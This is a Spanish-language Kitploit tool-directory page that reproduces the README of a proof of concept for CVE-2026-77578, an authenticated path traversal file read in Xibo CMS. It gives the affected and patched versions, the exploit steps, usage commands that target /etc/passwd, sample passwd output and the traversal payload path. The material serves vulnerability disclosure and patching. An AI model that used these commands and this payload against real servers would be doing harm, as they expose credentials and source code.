Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-77578 — Prueba de concepto en Python que explota CVE-2026-77578, un path traversal autenticado en Xibo CMS que lee archivos locales arbitrarios mediante importaciones de plantillas XML manipuladas. | Kitploit
Herramientas/GitHubGitHub/soskalai/cve-2026-77578
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubsoskalai/cve-2026-77578

CVE-2026-77578

Prueba de concepto en Python que explota CVE-2026-77578, un path traversal autenticado en Xibo CMS que lee archivos locales arbitrarios mediante importaciones de plantillas XML manipuladas.

Ver Repositorio
13hace 21 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-77578 — Lectura Arbitraria de Archivos Locales en Xibo CMS

Descripción General

CVE-2026-77578 es una vulnerabilidad de Lectura Arbitraria de Archivos Locales autenticada en Xibo CMS.

Un usuario autenticado con privilegios de Administrador o acceso a Plantillas de Módulo puede importar una plantilla XML manipulada que contiene un recurso basado en rutas con una secuencia de traversal. El recurso resultante puede entonces ser accedido a través del endpoint de recursos del módulo, provocando que Xibo devuelva el contenido del archivo local referenciado.

Versiones Afectadas y Parcheadas

  • Afectadas: Xibo CMS <= 4.4.3
  • Parcheadas: Xibo CMS >= 4.4.4
  • Remediación recomendada: Actualizar a Xibo CMS 4.4.4 o posterior.

Detalles de la Vulnerabilidad

  • CVE: CVE-2026-77578
  • GHSA: GHSA-pc3g-2hhm-46qc
  • Tipo de Vulnerabilidad: CWE-22 — Path Traversal
  • Autenticación: Requerida
  • Privilegio requerido: Acceso a la funcionalidad Developer Template
  • Severidad: Alta
  • CVSS v3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • Impacto: Lectura de archivos accesibles al usuario del servidor web

Prueba de Concepto

Aviso Oficial de Xibo

Xibo publicó la vulnerabilidad como GHSA-pc3g-2hhm-46qc, confirmando que las versiones <= 4.4.3 están afectadas y >= 4.4.4 están parcheadas. El aviso asigna severidad Alta con una puntuación CVSS v3.1 de 8.8 e identifica CVE-2026-77578.

El PoC en Python proporcionado automatiza el proceso de explotación:

  1. Se autentica en Xibo CMS.
  2. Recupera el token CSRF de la página de Plantillas de Módulo.
  3. Genera un identificador de recurso único.
  4. Sube una plantilla XML manipulada a través de /developer/template/import.
  5. El XML contiene un recurso basado en rutas usando una secuencia de traversal de ruta relativa.
  6. Solicita el recurso resultante a través de /module/asset/<asset-id>.
  7. Muestra el contenido del archivo local solicitado.

Uso

python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>

Ejemplo:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/passwd

Otro ejemplo:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/os-release

La opción -f por defecto es /etc/passwd.

Ejemplo de Salida

Lo siguiente demuestra la recuperación exitosa de /etc/passwd:

==============================================
 FILE CONTENT
==============================================

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

CVE-2026-77578 PoC Output

Flujo Técnico

Authenticated User
        |
        v
GET /developer/template/view
        |
        v
Extract X-XSRF-TOKEN
        |
        v
POST /developer/template/import
        |
        |  Crafted XML
        |  path="../../../../../etc/passwd"
        v
Xibo creates the asset
        |
        v
GET /module/asset/<asset-id>
        |
        v
Contents of local file returned

Validación

La vulnerabilidad fue validada exitosamente contra múltiples archivos en un entorno de prueba local de Xibo CMS 4.4.3, incluyendo:

  • /etc/passwd
  • /etc/hosts
  • /etc/os-release
  • /var/www/cms/web/index.php

La prueba con el archivo fuente PHP demuestra que el problema es capaz de devolver código fuente de la aplicación, no solo metadatos del sistema.

Impacto

La explotación exitosa permite a un atacante autenticado con los privilegios requeridos de Plantillas de Módulo leer archivos arbitrarios accesibles al proceso de la aplicación Xibo.

Dependiendo del despliegue, esto puede exponer:

  • Código fuente de la aplicación
  • Archivos de configuración
  • Credenciales
  • Claves de API
  • Información de conexión a la base de datos
  • Otros datos sensibles del sistema de archivos

Descargo de Responsabilidad

Esta prueba de concepto se proporciona únicamente para fines de investigación de seguridad autorizada y pruebas defensivas.

Solo pruebe sistemas que posea o para los que tenga permiso explícito de evaluar.

Estructura del Repositorio

CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
    └── poc-output.png
Descargar herramienta